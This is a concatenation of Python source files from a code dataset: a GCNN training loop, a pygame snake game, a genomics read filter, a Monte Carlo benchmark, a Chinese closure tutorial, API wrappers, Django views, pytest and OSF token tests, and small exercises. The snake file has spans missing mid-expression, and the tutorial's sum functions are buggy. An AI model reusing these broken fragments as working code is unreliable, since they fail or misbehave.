{train_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, train_kacc)]), logfile)\n\n # TEST\n valid_loss, valid_kacc = process(model, valid_data, top_k, None)\n log(f\"VALID LOSS: {valid_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, valid_kacc)]), logfile)\n\n if valid_loss < best_loss:\n plateau_count = 0\n best_loss = valid_loss\n model.save_state(os.path.join(running_dir, 'best_params.pkl'))\n log(f\" best model so far\", logfile)\n else:\n plateau_count += 1\n if plateau_count % early_stopping == 0:\n log(f\" {plateau_count} epochs without improvement, early stopping\", logfile)\n break\n if plateau_count % patience == 0:\n lr *= 0.2\n log(f\" {plateau_count} epochs without improvement, decreasing learning rate to {lr}\", logfile)\n\n model.restore_state(os.path.join(running_dir, 'best_params.pkl'))\n valid_loss, valid_kacc = process(model, valid_data, top_k, None)\n log(f\"BEST VALID LOSS: {valid_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, valid_kacc)]), logfile)\n\n","sub_path":"03_train_gcnn.py","file_name":"03_train_gcnn.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"2185562","text":"'''\nCreated on Jan 6, 2016\n\n@author: NVP\n'''\n\nimport pygame\nimport random\nimport math\nglobal size;\nsize = [900,550]\ndef drawCube(screen, color, x, y):\n startX = size[0]/2 + (x-y)*5*math.sqrt(3)\n startY = (x+y)*5\n pygame.draw.polygon(screen, (color[0]-100,color[1]-100,color[2]-100), ((startX+5*math.sqrt(3),startY+5), (startX,startY+10), (startX,startY+20), (startX+5*math.sqrt(3),startY+15)), 0)\n pygame.draw.polygon(screen, (color[0]-66,color[1]-66,color[2]-66), ((startX-5*math.sqrt(3),startY+5), (startX-5*math.sqrt(3),startY+15), (startX,startY+20), (startX,startY+10)), 0)\n pygame.draw.polygon(screen, (color[0],color[1],color[2]), ((startX-5*math.sqrt(3),startY+5), (startX,startY+10), (startX+5*math.sqrt(3),startY+5), (startX,startY)), 0)\n\n \nspeed = 20 #float(input(\"How fast do you want to go?(FPS)\"))\npygame.init()\n\ntext = \"\"\nscreen = pygame.display.set_mode(size)\n#screen2 = pygame.image.load('H:\\\\warploop.gif').convert\npygame.display.set_caption(\"Snake\")\nx = False\nw = False\nwhile w==False:\n clock = pygame.time.Clock()\n Blockx = 4\n Blocky = 4\n keys = pygame.key.get_pressed()\n KR = False\n KD = False\n KL = False\n KU = False\n safetyR = True\n safetyD = True\n safetyL = True\n safetyU = True\n Apple = True\n Colorboost = False\n Pause = False\n safetyp = 0\n safetyBack = True\n R = 0\n G = 0\n B = 0\n Score = 0\n boost = 0\n position = []\n counter = 0\n screen.fill([0,0,0])\n while x == False and Pause==False:\n if Pause==False:\n while(countersortedPosition[(j+1)*2] or (sortedPosition[j*2]==sortedPosition[(j+1)*2] and sortedPosition[j*2+1]>sortedPosition[(j+1)*2+1])):\n tempX = sortedPosition[j*2]\n tempY = sortedPosition[j*2+1]\n sortedPosition[(j)*2] = sortedPosition[(j+1)*2]\n sortedPosition[j*2+1] = sortedPosition[(j+1)*2+1]\n sortedPosition[(j+1)*2] = tempX\n sortedPosition[(j+1)*2+1] = tempY\n #print(sortedPosition)\n #s = \"\"\n while(counter49 or Blocky<0 or Blocky>49:\n x = True\n #print(\"wall\")\n if Applex==Blockx and Appley==Blocky:\n Apple = True\n position.append(700)\n position.append(500)\n position.append(710)\n position.append(510)\n position.append(720)\n position.append(520)\n position.append(730)\n position.append(530)\n position.append(Blockx)\n position.append(Blocky)\n# if Score==0:\n# screen.fill([0,0,0])\n Score=Score+20\n position.pop(0)\n position.pop(0)\n clock.tick(speed)\n while Pause:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p and safetyp==1:\n Pause = False\n safetyp = 0\n safetyp=1\n if event.type == pygame.QUIT:\n Pause = False\n x = True\n w = True\n print(\"GAME OVER!\")\n font = pygame.font.Font(None, 40)\n text = font.render(\"GAME OVER!\", False, (255, 255, 255))\n screen.blit(text, [340,200])\n print(\"Your score was \"+str(Score))\n text = font.render(\"Your score was \"+str(Score), False, (255, 255, 255))\n screen.blit(text, [320,220])\n text = font.render(\"Press 'space' to restart\", False, (255, 255, 255))\n screen.blit(text, [295,240])\n pygame.display.flip()\n while x==True:\n if w==True:\n break\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n x=False\n if event.type == pygame.QUIT:\n w = True\n while Pause:\n for event in pygame.event.get():\n if event.key == pygame.K_p and safetyp==1:\n Pause = False\n safetyp = 0\n safetyp=1\npygame.quit()\n\n","sub_path":"src/snake3D/snake3Dperspective.py","file_name":"snake3Dperspective.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294605915","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\n@Author : windz\n@Date : 2020-05-16 15:37:46\n@LastEditTime : 2020-06-24 16:58:34\n@Description : remove reads lost 5' end\n the 5' end is located downstream of the annotated first exon, \n likely due to incomplete reverse transcription\n'''\n\n\nimport pysam\nimport pandas as pd\nimport click\n\n\n@click.command()\n@click.option('-i', '--infile', required=True)\n@click.option('-o', '--outfile', required=True)\n@click.option('--first_exon_path', required=True)\ndef main(infile, outfile, first_exon_path):\n\n first_exon_path_df = pd.read_csv(\n first_exon_path, \n sep='\\t',\n index_col=['gene_id']\n )\n\n with pysam.AlignmentFile(infile, 'rb') as inbam, \\\n pysam.AlignmentFile(outfile, 'wb', template=inbam) as outbam:\n for read in inbam:\n read_gene_id = read.get_tag('gi')\n if read_gene_id == 'None':\n continue\n item = first_exon_path_df.loc[read_gene_id]\n is_intact = False\n \n '''\n single_exon基因筛选条加:\n * 要5'end位置在基因起始位置下游30%范围上游\n * 且read比对到基因组的长度(头减尾,非序列长度,\n 小于基因长度的1.5倍太长的可能就不是那个基因了\n '''\n if item['is_single_exon']:\n exon_len = item['exon_end']-item['exon_start']\n\n if (read.reference_end-read.reference_start)/exon_len >= 1.5:\n continue\n \n if not read.is_reverse \\\n and read.reference_start < item['exon_start']+exon_len*.3:\n is_intact = True\n elif read.is_reverse \\\n and read.reference_end > item['exon_end']-exon_len*.3:\n is_intact = True\n \n elif not read.is_reverse:\n read_fivePrime_pos = read.reference_start\n first_exon_end = item['exon_end']\n if read_fivePrime_pos <= first_exon_end:\n is_intact = True\n \n else:\n read_threePrime_pos = read.reference_end\n first_exon_start = item['exon_start']\n if read_threePrime_pos >= first_exon_start:\n is_intact = True\n \n if is_intact:\n outbam.write(read)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"pacbio_cdna/script/remove_five_prime_lost.py","file_name":"remove_five_prime_lost.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290265898","text":"#!/bin/env python3\n\nd = {}\n\nwith open('file.txt') as inf:\n for line in inf:\n my_list = line.lower().split()\n for word in my_list:\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n\nv = 0\nfor key, value in d.items():\n if value > v:\n k = key\n v = value\n elif value == v and key < k:\n k = key\n v = value\nprint(k, v)\n","sub_path":"stepik_task_2.py","file_name":"stepik_task_2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"54255826","text":"\"\"\"\nA basic monte-carlo implementation for calculating pi.\n\nNode 0 creates the shared objects and sums the result,\nall other nodes fetches the objects and each worker will work on one object each\n\"\"\"\n\nimport random, math, sys, os, time, logging\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom Board import Board\nimport PyDOOMS\n\n\n# Worker function\ndef monteCarlo(workerID, myDarts):\n\n if (workerID == 0):\n for boardID in range(PyDOOMS.getNumberOfWorkers()):\n Board(boardID)\n\n PyDOOMS.barrier()\n\n start = time.time()\n board = PyDOOMS.get(workerID)\n\n # Compute\n while (myDarts > 0):\n x = random.random()\n y = random.random()\n dist = math.sqrt((x*x)+(y*y))\n if (dist <= 1.0):\n board.hit()\n else:\n board.miss()\n\n myDarts = myDarts - 1\n board.ready = True\n\n PyDOOMS.objectUpdated(board, \"hits\")\n PyDOOMS.objectUpdated(board, \"darts\")\n PyDOOMS.objectUpdated(board, \"ready\")\n\n\n PyDOOMS.barrier()\n\n # Sum result\n if (workerID == 0):\n pi = 0.0\n i = 0\n while i < PyDOOMS.getNumberOfWorkers():\n b = PyDOOMS.get(i)\n if b.ready:\n pi = pi + b.calc_pi()\n i = i + 1\n else:\n logging.critical(\"Board: \" + str(i) + \" - \" + str(b.ready))\n time.sleep(1)\n\n logging.info(\"Pi: \" + str(pi / PyDOOMS.getNumberOfWorkers()) + \" calculated in \" + str(time.time() - start) + \" seconds.\")\n\n logging.info(\"Worker: \" + str(workerID) + \" dead. Worked for \" + str(time.time() - start) + \" seconds.\")\n\n\n\ndarts = 4000000 / PyDOOMS.getNumberOfWorkers()\n\nPyDOOMS.execute(monteCarlo, darts)\n\n","sub_path":"1.0/Benchmarks/MonteCarlo.py","file_name":"MonteCarlo.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"132670244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-6-21 下午3:04\n# @Author : Aries\n# @Site : http://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000/001431835236741e42daf5af6514f1a8917b8aaadff31bf000\n# @File : 返回函数.py\n# @Software: PyCharm Community Edition\n# @Function :\n# 函数作为返回值\n# 高阶函数除了可以接受函数作为参数外,还可以把函数作为结果值返回。\n# 我们来实现一个可变参数的求和。通常情况下,求和的函数是这样定义的:\ndef calc_sum(*args):\n sumResult = 0\n for n in args:\n sumResult = sumResult + args\n\n return sumResult\n\n\n# 但是,如果不需要立刻求和,而是在后面的代码中,根据需要再计算怎么办?可以不返回求和的结果,而是返回求和的函数\ndef lazy_sum(*args):\n def sum():\n sumResult = 0\n for arg in args:\n sumResult = sumResult + arg\n\n return sum\n\n\n# 当我们调用lazy_sum()时,返回的并不是求和结果,而是求和函数:\nf = lazy_sum(1, 3, 5, 7, 9)\nprint(f)\nrs = f()\nprint(rs)\n# 在这个例子中,我们在函数lazy_sum中又定义了函数sum,并且,内部函数sum可以引用外部函数lazy_sum的参数和局部变量,当lazy_sum返回函数sum时,相关参数和变量都保存在返回的函数中,这种称为“闭包(Closure)”的程序结构拥有极大的威力。\n# 请再注意一点,当我们调用lazy_sum()时,每次调用都会返回一个新的函数,即使传入相同的参数:\nf1 = lazy_sum(1, 3, 5, 7, 9)\nf2 = lazy_sum(1, 3, 5, 7, 9)\nprint(f1 == f2)\n\nprint('====================================================')\n# 闭包\n# 注意到返回的函数在其定义内部引用了局部变量args,所以,当一个函数返回了一个函数后,其内部的局部变量还被新函数引用,所以,闭包用起来简单,实现起来可不容易。\n# 另一个需要注意的问题是,返回的函数并没有立刻执行,而是直到调用了f()才执行。我们来看一个例子:\n","sub_path":"learnPython/函数式编程/返回函数/返回函数.py","file_name":"返回函数.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"253104500","text":"# -*- encoding: utf-8 -*-\r\nimport urllib\r\nimport urllib2\r\nfrom xml.etree import ElementTree\r\nimport logging \r\n\r\nimport yahoo_dev_api_settings\r\n\r\nclass YahooRelatedWordSearchResult(object):\r\n def __init__(self):\r\n self.item_list = []\r\n \r\nclass YahooRelatedWordSearch(yahoo_dev_api_settings.YahooDevApiBase):\r\n ''' Yahoo Developer Network Related Word Search API http://developer.yahoo.co.jp/webapi/search/assistsearch/v1/webunitsearch.html\r\n parameters \r\n q: query strings\r\n '''\r\n @property\r\n def base_url(self):\r\n return r'http://search.yahooapis.jp/AssistSearchService/V1/webunitSearch'\r\n \r\n @property\r\n def xmlns(self):\r\n return r'urn:yahoo:jp:srchunit'\r\n \r\n def search(self, query_map):\r\n query = ''\r\n plain_query = ''\r\n encode = 'utf-8'\r\n\r\n try:\r\n query = query_map['q']\r\n plain_query = query.encode(encode)\r\n query = urllib.quote(plain_query, self.safe_chars)\r\n except:\r\n pass\r\n \r\n param_map = {'appid':self.aid,\r\n 'query':query,\r\n 'results':'30',\r\n }\r\n \r\n param_list = [key + '=' + param_map[key] \r\n for key in param_map.keys()\r\n ]\r\n \r\n q_results = r'.//%s' % (self.qn('Result'))\r\n \r\n url = self.base_url + '?' + ('&'.join(param_list))\r\n f = urllib2.urlopen(url)\r\n root = ElementTree.parse(f).getroot()\r\n \r\n search_result = YahooRelatedWordSearchResult()\r\n results = root.findall(q_results)\r\n \r\n search_list = []\r\n logging.info(q_results)\r\n for result in results:\r\n search_list.append(result.text)\r\n \r\n search_result.item_list = search_list\r\n return search_result\r\n","sub_path":"typea-mixi01/src/yahoo/yahoo_related_search.py","file_name":"yahoo_related_search.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248611152","text":"from pathlib import Path\nimport json\n\nBANK_DIRECTORY = \"banks/\"\n\n\ndef convert(bank_number):\n with open(f\"{BANK_DIRECTORY}bank_{bank_number}.json\", \"r\") as b:\n bank = json.load(b)\n bank_info = {\n \"name\": bank[\"name\"],\n \"version\": bank[\"version\"],\n }\n output_dir = f\"{BANK_DIRECTORY}bank_{bank_number}\"\n Path(output_dir).mkdir(exist_ok=True)\n with open(f\"{output_dir}/bank.json\", \"w\") as b:\n json.dump(bank_info, b)\n preset_number = 0\n for p in bank[\"presets\"]:\n with open(f\"{output_dir}/preset_{preset_number}.json\", \"w\") as p_file:\n json.dump(p, p_file)\n preset_number += 1\n\n\nif __name__ == \"__main__\":\n for i in range(1, 11):\n convert(i)\n","sub_path":"esp8266/tools/convert_banks.py","file_name":"convert_banks.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126107508","text":"import pytest\nfrom flaskapp.api.models.books import Book\nfrom flaskapp.api.models.user import User\nfrom flaskapp.api.models.wish_list import WishList\n\n\n@pytest.mark.parametrize(\n \"mock_model, expected\",\n [\n (Book(isbn=\"123-123\", author=\"bogus\"), 'Book: 123-123'),\n (User(user_id=1, first_name=\"Lane\", last_name=\"bogus\"), 'User: 1'),\n (WishList(user_id=1, isbn=\"123-123\"), 'WishList: 1'),\n ],\n)\ndef test_str_model(mock_model, expected):\n result = str(mock_model)\n assert result == expected\n\n@pytest.mark.parametrize(\n \"mock_model, expected\",\n [\n (Book(isbn=\"123-123\", author=\"bogus\"), ''),\n (User(user_id=1, first_name=\"Lane\", last_name=\"bogus\"), ''),\n (WishList(user_id=1, isbn=\"123-123\"), ''),\n ],\n)\ndef test_repr_model(mock_model, expected):\n result = repr(mock_model)\n assert result == expected\n\ndef test_to_dict():\n wish_list = WishList(user_id=1, isbn=\"123-123\")\n result = wish_list.to_dict()\n expected = {'user_id': 1, 'isbn': '123-123'}\n assert result == expected\n","sub_path":"wish_list-main/book_wishlist-main/src/tests/models/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"42463702","text":"import numpy as np\nimport pandas as pd\n\ndef entropia (vp):\n somatorio = 0;\n for p in vp :\n somatorio += 0 if (p == 0) else p * np.log2(p) \n return somatorio * (-1)\n\ndef entropia_valores(valores):\n import collections\n counter = collections.Counter(valores)\n vp = [ (n/len(valores)) for n in counter.values() ] \n return entropia(vp) \n\ndef entropia_atributo(X, atributo, classe) :\n somatorio = 0 \n for valor, Xj in X.groupby(atributo): \n p_Xj = len(Xj) / len(X) \n E_Xj = entropia_valores(Xj[classe])\n somatorio += p_Xj * E_Xj \n return somatorio\n\ndef entropia_atributo_detalhes(X, atributo, classe) :\n somatorio = 0\n detalhes = pd.DataFrame(columns = ['valor','prop_Xj'])\n for valor, Xj in X.groupby(atributo): \n p_Xj = len(Xj) / len(X) \n E_Xj = entropia_valores(Xj[classe])\n somatorio += p_Xj * E_Xj\n detalhes = detalhes.append({'valor' : valor, 'prop_Xj' : p_Xj, 'E(Xj)' : E_Xj }, 1)\n return somatorio, detalhes\n\ndef ganho_de_informacao(X,atributo,classe) :\n E_X = entropia_valores(X[classe])\n E_X_A = entropia_atributo(X,atributo,classe)\n return E_X - E_X_A\n\ndef razao_de_ganho (X, atributo, classe):\n IG = ganho_de_informacao(X, atributo, classe)\n I = entropia_valores(X[atributo])\n return IG / I\n\ndef ganho_de_informacao_todos(df,classe):\n return pd.DataFrame({ \n 'InformationGain': df.drop([classe],1).apply(\n lambda x : ganho_de_informacao(df,x.name,classe),0),\n })\n","sub_path":"aula07/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"3656771","text":"import copy\nimport mock\n\nfrom nose.tools import * # flake8: noqa\n\nfrom website.models import User, ApiOAuth2PersonalToken\nfrom website.util import api_v2_url\nfrom website.util import sanitize\n\nfrom tests.base import ApiTestCase\nfrom osf_tests.factories import ApiOAuth2PersonalTokenFactory, AuthUserFactory\n\nTOKEN_LIST_URL = api_v2_url('tokens/', base_route='/')\n\ndef _get_token_detail_route(token):\n path = \"tokens/{}/\".format(token._id)\n return api_v2_url(path, base_route='/')\n\n\nclass TestTokenList(ApiTestCase):\n def setUp(self):\n super(TestTokenList, self).setUp()\n\n self.user1 = AuthUserFactory()\n self.user2 = AuthUserFactory()\n\n self.user1_tokens = [ApiOAuth2PersonalTokenFactory(owner=self.user1) for i in xrange(3)]\n self.user2_tokens = [ApiOAuth2PersonalTokenFactory(owner=self.user2) for i in xrange(2)]\n\n self.user1_list_url = TOKEN_LIST_URL\n self.user2_list_url = TOKEN_LIST_URL\n\n self.sample_data = {\n 'data': {\n 'type': 'tokens',\n 'attributes': {\n 'name': 'A shiny new token',\n 'scopes': 'osf.full_write',\n 'owner': 'Value discarded',\n 'token_id': 'Value discarded',\n }\n }\n }\n\n def test_user1_should_see_only_their_tokens(self):\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens))\n\n def test_user2_should_see_only_their_tokens(self):\n res = self.app.get(self.user2_list_url, auth=self.user2.auth)\n assert_equal(len(res.json['data']),\n len(self.user2_tokens))\n\n @mock.patch('framework.auth.cas.CasClient.revoke_tokens')\n def test_deleting_token_should_hide_it_from_api_list(self, mock_method):\n mock_method.return_value(True)\n api_token = self.user1_tokens[0]\n url = _get_token_detail_route(api_token)\n\n res = self.app.delete(url, auth=self.user1.auth)\n assert_equal(res.status_code, 204)\n\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(res.status_code, 200)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens) - 1)\n\n def test_created_tokens_are_tied_to_request_user_with_data_specified(self):\n res = self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n\n assert_equal(res.json['data']['attributes']['owner'], self.user1._id)\n # Some fields aren't writable; make sure user can't set these\n assert_not_equal(res.json['data']['attributes']['token_id'],\n self.sample_data['data']['attributes']['token_id'])\n\n def test_create_returns_token_id(self):\n res = self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n assert_true(res.json['data']['attributes'].has_key('token_id'))\n\n def test_field_content_is_sanitized_upon_submission(self):\n bad_text = \"User_text\"\n cleaned_text = sanitize.strip_html(bad_text)\n\n payload = copy.deepcopy(self.sample_data)\n payload['data']['attributes']['name'] = bad_text\n\n res = self.app.post_json_api(self.user1_list_url, payload, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n assert_equal(res.json['data']['attributes']['name'], cleaned_text)\n\n def test_created_tokens_show_up_in_api_list(self):\n res = self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens) + 1)\n\n def test_returns_401_when_not_logged_in(self):\n res = self.app.get(self.user1_list_url, expect_errors=True)\n assert_equal(res.status_code, 401)\n\n def test_cannot_create_admin_token(self):\n self.sample_data['data']['attributes']['scopes'] = 'osf.admin'\n res = self.app.post_json_api(self.user1_list_url,\n self.sample_data,\n auth=self.user1.auth,\n expect_errors=True\n )\n assert_equal(res.status_code, 400)\n assert_equal(res.json['errors'][0]['detail'], 'User requested invalid scope')\n\n def test_cannot_create_usercreate_token(self):\n self.sample_data['data']['attributes']['scopes'] = 'osf.users.create'\n res = self.app.post_json_api(self.user1_list_url,\n self.sample_data,\n auth=self.user1.auth,\n expect_errors=True\n )\n assert_equal(res.status_code, 400)\n assert_equal(res.json['errors'][0]['detail'], 'User requested invalid scope')\n","sub_path":"api_tests/tokens/views/test_token_list.py","file_name":"test_token_list.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"451330761","text":"# encoding=utf-8\nimport csv\n# print(abs_lines[1].split(',')[0])\nabs_num_file = open('F:/Label recommendation/ctrsr_datasets/citeulike-a/raw-data.csv', 'r', encoding='utf-8',errors='ignore')\n#text\nreadabs = csv.reader(abs_num_file)\ntag_num_file = open('F:/Label recommendation/ctrsr_datasets/citeulike-a/item-tag.dat', 'r', encoding='utf-8',errors='ignore')\nreadtag = csv.reader(tag_num_file)\ntag_lines = tag_num_file.readlines()\nabs_lines = abs_num_file.readlines()\nout2 = open('F:\\\\Label recommendation\\\\TFIDF\\\\boost_ID.txt','w')\nadd = []\ni = 1\nfor tag_line in tag_lines:\n if len(tag_line) >= 5:\n add.append(i)\n i = i + 1\n out2.write(tag_line)\n else:\n i = i + 1\n# print(add)\nj = 1\nout1 = open('F:\\\\Label recommendation\\\\TFIDF\\\\boost_text.txt','w',encoding='utf-8')\nout1.write(abs_lines[0])\nfor abs_line in abs_lines[1:]:\n temp = abs_line.split(',')[0]\n # print(type(abs_line))\n if int(temp) in add:\n # print(temp)\n out1.write(str(j)+','+' '.join(abs_line.split(',',1)[1:]))\n j += 1 \n\n\n # out1.write(abs_line+'\\n')\n#\n# final_text1 = []\n# final_text2 = []\n# # print(tag_lines[add[0]])\n# j = 0\n# out1 = open('boost_text.txt','w')\n# out2 = open('boost_ID.txt','w')\n# for i in range(0, len(add)):\n# final_text1.append(tag_lines[add[i]].strip())\n# final_text2.append(str(j) + ' ' + str(abs_lines[add[i]].split(',')[1:]))\n# # print(abs_lines[1].split(',')[0])\n# j += 1\n# for k in range(26):\n# # print(final_text1[k])\n# print(final_text2[k])\n# # print(abs_lines[1].split(',')[1:])\n# print(final_text2)\n# out1.write(str(final_text1) + '\\n')\n# out2.write(str(final_text2))\n\n\n# print(abs_lines[add[1]])\n\n","sub_path":"TFIDF/new text.py","file_name":"new text.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"187798832","text":"'''\nMARS Blender Tools - a Blender Add-On to work with MARS robot models\n\nFile mtcontrollers.py\n\nCreated on 30 Jan 2014\n\n@author: Kai von Szadkowski\n\nCopy this add-on to your Blender add-on folder and activate it\nin your preferences to gain instant (virtual) world domination.\nYou may use the provided install shell script.\n'''\n\nimport bpy\nfrom bpy.types import Operator\nfrom bpy.props import StringProperty, BoolProperty, FloatProperty\nimport marstools.mtmaterials as mtmaterials\nimport marstools.mtdefs as mtdefs\nimport marstools.mtutility as mtutility\n\n\ndef register():\n print(\"Registering mtcontrollers...\")\n\n\ndef unregister():\n print(\"Unregistering mtcontrollers...\")\n\n\nclass AddControllerOperator(Operator):\n \"\"\"AddControllerOperator\"\"\"\n bl_idname = \"object.mt_add_controller\"\n bl_label = \"Add a node-dependent controller\"\n bl_options = {'REGISTER', 'UNDO'}\n\n controller_scale = FloatProperty(\n name = \"controller scale\",\n default = 0.05,\n description = \"scale of the controller visualization\")\n\n controller_name = StringProperty(\n name = \"controller name\",\n default = 'controller',\n description = \"name of the controller\")\n\n def execute(self, context):\n location = bpy.context.scene.cursor_location\n objects = []\n controllers = []\n for obj in bpy.context.selected_objects:\n if obj.MARStype == \"controller\":\n controllers.append(obj)\n else:\n objects.append(obj)\n if len(controllers) <= 0:\n mtutility.createPrimitive(\"controller\", \"sphere\", self.controller_scale, mtdefs.layerTypes[\"sensor\"], \"controller\", location)\n bpy.context.scene.objects.active.MARStype = \"controller\"\n bpy.context.scene.objects.active.name = \"controller\"\n controllers.append(bpy.context.scene.objects.active)\n #empty index list so enable update of controller\n for ctrl in controllers:\n sensors = [obj.name for obj in objects if obj.MARStype == 'sensor']\n motors = [obj.name for obj in objects if obj.MARStype == 'motor']\n ctrl['sensors'] = sorted(sensors, key=str.lower)\n ctrl['motors'] = sorted(motors, key=str.lower)\n print(\"Added joints to (new) controller(s).\")\n #for prop in mtdefs.controllerProperties[self.controller_type]:\n # for ctrl in controllers:\n # ctrl[prop] = mtdefs.controllerProperties[prop]\n return {'FINISHED'}\n\n\nclass AddLegacyControllerOperator(Operator):\n \"\"\"AddControllerOperator\"\"\"\n bl_idname = \"object.mt_add_legacy_controller\"\n bl_label = \"Add a node-dependent controller\"\n bl_options = {'REGISTER', 'UNDO'}\n\n controller_scale = FloatProperty(\n name = \"controller_scale\",\n default = 0.05,\n description = \"scale of the controller visualization\")\n\n def execute(self, context):\n location = bpy.context.scene.cursor_location\n objects = []\n controllers = []\n for obj in bpy.context.selected_objects:\n if obj.MARStype == \"controller\":\n controllers.append(obj)\n else:\n objects.append(obj)\n if len(controllers) <= 0:\n mtutility.createPrimitive(\"controller\", \"sphere\", self.controller_scale, mtdefs.layerTypes[\"sensor\"], \"controller\", location)\n bpy.context.scene.objects.active.MARStype = \"controller\"\n bpy.context.scene.objects.active.name = \"controller\"\n controllers.append(bpy.context.scene.objects.active)\n #empty index list so enable update of controller\n for ctrl in controllers:\n for key in ctrl.keys():\n if key.find(\"index\") >= 0:\n del ctrl[key]\n print(\"Deleting \" + key + \" in \" + ctrl.name)\n i = 1\n for obj in objects:\n if obj.MARStype == \"link\":\n ctrl[\"index\"+(str(i) if i >= 10 else \"0\"+str(i))] = obj.name\n i += 1\n print(\"Added joints to (new) controller(s).\")\n #for prop in mtdefs.controllerProperties[self.controller_type]:\n # for ctrl in controllers:\n # ctrl[prop] = mtdefs.controllerProperties[prop]\n return {'FINISHED'}\n","sub_path":"scripts/blender/marstools/mtcontrollers.py","file_name":"mtcontrollers.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89989951","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom .models import Custom, VideoImage\nfrom .serializer import CustomSerializer,VideoImageSerializer\nfrom rest_framework.response import Response\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom rest_framework import status\n\nclass LastCustom(APIView):\n def get(self,response):\n last_file = Custom.objects.all()\n if last_file:\n last_file = last_file[0]\n last_file = CustomSerializer(last_file)\n return Response(last_file.data)\n return Response([])\n\nclass LastVideoImage(APIView): \n def get(self,response):\n last_file = VideoImage.objects.all()\n if last_file:\n last_file = last_file[0]\n last_file = VideoImageSerializer(last_file)\n return Response(last_file.data)\n return Response([])\n\n\ndef downloadCustom(request,id):\n try:\n archivo = get_object_or_404(Custom, id=id)\n contents = archivo.file\n name_file = archivo.name\n response = HttpResponse(contents)\n\n response['Content-Disposition'] = 'attachment; filename={}'.format(name_file)\n return response\n\n except Exception as e:\n if type(e) is Http404:\n return Response(False, status=status.HTTP_404_NOT_FOUND)\n else:\n return Response({\"detail\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\ndef downloadVideoImage(request,id):\n try:\n archivo = get_object_or_404(VideoImage, id=id)\n contents = archivo.file\n name_file = archivo.name\n response = HttpResponse(contents)\n\n response['Content-Disposition'] = 'attachment; filename={}'.format(name_file)\n return response\n\n except Exception as e:\n if type(e) is Http404:\n return Response(False, status=status.HTTP_404_NOT_FOUND)\n else:\n return Response({\"detail\": str(e)}, status=status.HTTP_400_BAD_REQUEST)","sub_path":"Actualizations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"386193015","text":"#!/usr/bin/env python3\n\n# Define favorite languages\nfav_lang = {\n 'fred':'c',\n 'janna':'java',\n 'link':'lua',\n 'mark':'c#',\n 'john':'assembly',\n 'thuan':'python',\n 'selena':'java',\n 'thuan':'c',\n 'komos':'ruby',\n 'vicktor':'c++',\n }\n\n# Define friends list\nfriends = [\n 'janna', 'mark', 'komos', 'scott', 'amelie', 'ashley', 'rachel',\n 'benjamin', 'thuan', 'selena', 'vicktor'\n ]\n\nfor name,lang in fav_lang.items():\n if name in friends:\n print(\"Hi \" + name.title() +\n \", I see your favorite language is \" +\n lang.title() + \"!\\n\"\n )\n \nfor friend in friends:\n if friend not in fav_lang.keys():\n print(friend.title() + \", please take our 